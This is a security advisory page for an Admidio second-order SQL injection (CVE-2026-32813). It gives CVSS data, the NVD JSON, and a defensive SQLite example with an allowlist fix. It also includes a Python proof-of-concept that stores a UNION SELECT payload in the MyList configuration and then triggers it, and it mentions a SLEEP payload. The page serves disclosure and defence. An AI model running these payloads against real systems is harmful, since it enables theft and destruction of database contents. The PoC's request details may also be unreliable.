Security Vulnerability Report
CVE-2026-32813 CVSS 8.0 HIGH

Published: 2026-03-20 02:16:35
Last Modified: 2026-03-23 15:25:43

Description

Admidio is an open-source user management solution. Versions 5.0.6 and below are vulnerable to arbitrary SQL Injection through the MyList configuration feature. The MyList configuration feature lets authenticated users define custom list column layouts, storing user-supplied column names, sort directions, and filter conditions in the adm_list_columns table via prepared statements. However, these stored values are later read back and interpolated directly into dynamically constructed SQL queries without sanitization or parameterization, creating a classic second-order SQL injection vulnerability (safe write, unsafe read). An attacker can exploit this to inject arbitrary SQL, potentially reading, modifying, or deleting any data in the database and achieving full database compromise. This issue has been fixed in version 5.0.7.
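The "safe write, unsafe read" pattern the description names is easier to see with the two halves side by side. The following is an added example, not Admidio's code and not the advisory's: a constructed SQLite schema in the same shape (a users table plus a per-list column table), a parameterized write, a read that interpolates the stored strings, and a hardened read that checks every stored identifier and sort keyword against an allowlist. Table and column names, the allowlist, and the sample rows are assumptions made for the example.

```python
import sqlite3
from typing import Callable, List, Tuple

# Constructed in-memory schema mirroring the shape of the pattern (assumption for this
# example, not Admidio's real schema).
SCHEMA = """
CREATE TABLE adm_users (
    usr_id INTEGER PRIMARY KEY,
    usr_login_name TEXT NOT NULL,
    usr_email TEXT NOT NULL
);
CREATE TABLE adm_list_columns (
    lsc_id INTEGER PRIMARY KEY,
    lsc_lst_id INTEGER NOT NULL,
    lsc_column TEXT NOT NULL,
    lsc_sort TEXT NOT NULL
);
"""

# Allowlist of identifiers a list may reference. In a real application this is derived
# from the schema or field definitions, never from anything a user stored.
ALLOWED_COLUMNS = {"usr_id", "usr_login_name", "usr_email"}
ALLOWED_SORT = {"ASC", "DESC"}


def open_db() -> sqlite3.Connection:
    """Create the constructed schema with two sample users."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany(
        "INSERT INTO adm_users (usr_login_name, usr_email) VALUES (?, ?)",
        [("alice", "alice@example.org"), ("bob", "bob@example.org")],
    )
    return conn


def store_column(conn: sqlite3.Connection, lst_id: int, column: str, sort: str) -> None:
    """Safe write: the prepared statement stores the user's string verbatim, whatever it is."""
    conn.execute(
        "INSERT INTO adm_list_columns (lsc_lst_id, lsc_column, lsc_sort) VALUES (?, ?, ?)",
        (lst_id, column, sort),
    )


def load_columns(conn: sqlite3.Connection, lst_id: int) -> List[Tuple[str, str]]:
    return conn.execute(
        "SELECT lsc_column, lsc_sort FROM adm_list_columns WHERE lsc_lst_id = ? ORDER BY lsc_id",
        (lst_id,),
    ).fetchall()


def build_query_unsafe(conn: sqlite3.Connection, lst_id: int) -> str:
    """Unsafe read: stored strings are pasted into SQL as if the database were a trusted source."""
    cols = load_columns(conn, lst_id)
    select = ", ".join(col for col, _ in cols)
    order = ", ".join(f"{col} {sort}" for col, sort in cols)
    return f"SELECT {select} FROM adm_users ORDER BY {order}"


def build_query_safe(conn: sqlite3.Connection, lst_id: int) -> str:
    """Hardened read: identifiers and keywords must come from the allowlist; anything else is rejected."""
    cols = load_columns(conn, lst_id)
    if not cols:
        raise ValueError("list has no columns")
    for col, sort in cols:
        if col not in ALLOWED_COLUMNS:
            raise ValueError(f"column not permitted: {col!r}")
        if sort.upper() not in ALLOWED_SORT:
            raise ValueError(f"sort direction not permitted: {sort!r}")
    # Quoting is belt-and-braces here: the names are already known-good identifiers.
    select = ", ".join(f'"{col}"' for col, _ in cols)
    order = ", ".join(f'"{col}" {sort.upper()}' for col, sort in cols)
    return f"SELECT {select} FROM adm_users ORDER BY {order}"


def fetch_list(conn: sqlite3.Connection, lst_id: int, builder: Callable) -> list:
    """Run the query a builder produces and return its rows."""
    return conn.execute(builder(conn, lst_id)).fetchall()


if __name__ == "__main__":
    db = open_db()
    store_column(db, 1, "usr_login_name", "ASC")
    # A stored "column name" that is really a SQL fragment: the write accepts it unchanged.
    store_column(db, 2, "usr_login_name, usr_email", "ASC")
    print(fetch_list(db, 1, build_query_unsafe))   # one column, as intended
    print(fetch_list(db, 2, build_query_unsafe))   # query structure changed by stored data
    try:
        build_query_safe(db, 2)
    except ValueError as err:
        print("rejected:", err)
```

The point the example makes is that the prepared statement on the write path gives no protection on the read path: a value that survived the insert can still change the structure of a later query, and the only thing that stops it is validating the value at the moment it is turned into SQL. Identifiers and keywords cannot be bound as parameters, so an allowlist (or a lookup against the schema) is the fix, which is what a patched read path has to do.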

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE
Admidio <= 5.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "http://example.com/admidio"
login_url = f"{target_url}/adm_program/system/login.php"
list_url = f"{target_url}/adm_program/modules/lists/mylist_function.php"

# Attacker credentials (low privilege user)
credentials = {
    "usr_login_name": "attacker",
    "usr_password": "password"
}

session = requests.Session()

# Step 1: Authenticate
print("[*] Logging in...")
login_resp = session.post(login_url, data=credentials)
if login_resp.status_code != 200:
    print("[-] Login failed")
    exit()

# Step 2: Inject payload via MyList configuration
# The payload targets a column name that will be concatenated into SQL later
# Example Payload: ' OR SLEEP(5)--
sql_payload = "test' UNION SELECT 1,2,3,4,5,6,7,8,9-- -"

print("[*] Sending malicious payload to MyList configuration...")
exploit_data = {
    "mode": "save",
    "lst_id": "1",
    "columns[]": [sql_payload],  # Injecting into the column definition
    "sort": "ASC"
}
store_resp = session.post(list_url, data=exploit_data)

# Step 3: Trigger the vulnerability
# Accessing the list page forces the app to read the stored config and build the SQL
print("[*] Triggering the vulnerability by accessing the list...")
trigger_resp = session.get(f"{target_url}/adm_program/modules/lists/lists_show.php?lst_id=1")
if trigger_resp.status_code == 200:
    print("[+] Request sent. Check database for execution of payload.")
else:
    print("[-] Trigger failed")

References

https://github.com/Admidio/admidio/commit/3473bf5a7aa1bfc5043e73979719396276f4189f (Patch)
https://github.com/Admidio/admidio/security/advisories/GHSA-3x67-4c2c-w45m (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32813", "sourceIdentifier": "[email protected]", "published": "2026-03-20T02:16:35.210", "lastModified": "2026-03-23T15:25:42.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Versions 5.0.6 and below are vulnerable to arbitrary SQL Injection through the MyList configuration feature. The MyList configuration feature lets authenticated users define custom list column layouts, storing user-supplied column names, sort directions, and filter conditions in the adm_list_columns table via prepared statements. However, these stored values are later read back and interpolated directly into dynamically constructed SQL queries without sanitization or parameterization, creating a classic second-order SQL injection vulnerability (safe write, unsafe read). An attacker can exploit this to inject arbitrary SQL, potentially reading, modifying, or deleting any data in the database and achieving full database compromise. This issue has been fixed in version 5.0.7."}, {"lang": "es", "value": "Admidio es una solución de gestión de usuarios de código abierto. Las versiones 5.0.6 e inferiores son vulnerables a inyección SQL arbitraria a través de la característica de configuración MyList. La característica de configuración MyList permite a los usuarios autenticados definir diseños de columnas de lista personalizados, almacenando nombres de columna, direcciones de ordenación y condiciones de filtro proporcionados por el usuario en la tabla adm_list_columns a través de sentencias preparadas. Sin embargo, estos valores almacenados se leen posteriormente y se interpolan directamente en consultas SQL construidas dinámicamente sin sanitización ni parametrización, creando una vulnerabilidad de inyección SQL de segundo orden clásica (escritura segura, lectura insegura). Un atacante puede explotar esto para inyectar SQL arbitrario, potencialmente leyendo, modificando o eliminando cualquier dato en la base de datos y logrando un compromiso total de la base de datos. Este problema ha sido corregido en la versión 5.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.0.7", "matchCriteriaId": "3347E657-D132-4D87-A355-391136657A27"}]}]}], "references": [{"url": "https://github.com/Admidio/admidio/commit/3473bf5a7aa1bfc5043e73979719396276f4189f", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-3x67-4c2c-w45m", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-3x67-4c2c-w45m", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}